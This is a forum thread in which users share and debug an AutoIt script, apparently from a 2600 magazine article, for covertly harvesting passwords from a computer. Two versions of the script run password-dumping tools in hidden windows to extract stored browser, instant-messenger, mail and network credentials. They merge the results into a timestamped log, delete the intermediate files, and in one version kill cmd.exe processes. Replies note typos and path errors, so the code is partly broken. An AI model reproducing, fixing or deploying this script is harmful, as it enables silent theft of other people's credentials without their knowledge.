2600-ipod Sneakyness

Well, 48 hours ago I had never read 2600 or had ANY experience whatsoever with this script. A friend of mine just bought the issue of 2600 with that code in it and I found it intriguing. After a few downloads I had all I needed.....then I found the code had problems. I set on learning how to fix it myself. Now, approximately 40 hours after seeing the article I have found the problems and am working the script perfectly well, my persistance paid off. Well, enough rambling, here's the code.

As you may notice I had to change the sleep times. That was merely because my processor is WAY too slow. Feel free to mess with the sleep times yourselves, good luck.

Run(@ComSpec & ' /k "..\\Password\\Software\\pspv.exe /stext ..\\Password\\new\\pspv.txt"', @ScriptDir, @SW_HIDE) 
sleep(200) 

Run(@ComSpec & ' /k "..\\Password\\Sofware\\im.exe /stext ..\\Password\\new\\im.txt"', @ScriptDir, @SW_HIDE) 
sleep(200) 

Run(@ComSpec & ' /k "..\\Password\\Sofware\\mail.exe /stext ..\\Password\\new\\mail.txt"', @ScriptDir, @SW_HIDE) 
sleep(200) 

Run(@ComSpec & ' /k "..\\Password\\Sofware\\network.exe /stext ..\\Password\\new\\network.txt"', @ScriptDir, @SW_HIDE) 
sleep(3000) 

Run(@ComSpec & ' /k "COPY ..\\Password\\new\\*.txt ..\\Password\\new\\all.txt"', @ScriptDir, @SW_HIDE) 
sleep(3000) 

Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC 
Dim $Location = @WorkingDir & '\\new\\' 
Dim $FileName = "all.txt" 

FileMove($Location & $FileName , $Location & $DateTime & ".log",1) 
sleep(3000) 

Run(@ComSpec & ' /k "del ..\\Password\\new\\*.txt"', @ScriptDir, @SW_HIDE) 
sleep(1000)

I tried their original code and it didn't work well for me but either did yours.

Is /k refering to the drive letter?

And in your code, Software changes to Sofware in later lines.

I am getting this error:

Error 3: The system cannot find path specified, is this because of your double slashes? Thanks.

• 1 month later...

Hello,

Can someone help me with this script. I can not get it to write the txt files to the lof file.

Here is the code for the project

;Working without writing log file

Run(@ComSpec & ' /k "pspv.exe /stext ..\\take\pspv.txt"', @ScriptDir, @SW_HIDE)

sleep(200)

Run(@ComSpec & ' /k "IM.exe /stext ..\\take\mspass.txt"', @ScriptDir, @SW_HIDE)

sleep(200)

Run(@ComSpec & ' /k "mail.exe /stext ..\\take\mailpv.txt"', @ScriptDir, @SW_HIDE)

sleep(200)

Run(@ComSpec & ' /k "network.exe /stext ..\\take\netpass.txt"', @ScriptDir, @SW_HIDE)

sleep(3000)

Run(@ComSpec & ' /k "COPY .\\take\*.txt ..\\take\all.txt"', @ScriptDir, @SW_HIDE)

sleep(3000)

Dim $DateTime, $Location, $FileName

$DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC

$Location = @WorkingDir & '..\\take\'

$FileName = "all.txt"

FileMove($Location & $FileName , $Location & $DateTime & ".log",1)

sleep(3000)

;Run(@ComSpec & ' /k "del ..\\take\*.txt"', @ScriptDir, @SW_HIDE)

;sleep(1000)

Run(@ComSpec & ' /k "process.exe -k cmd.exe"', @ScriptDir, @SW_HIDE)

Thanks,

Mike

Edited by MikeS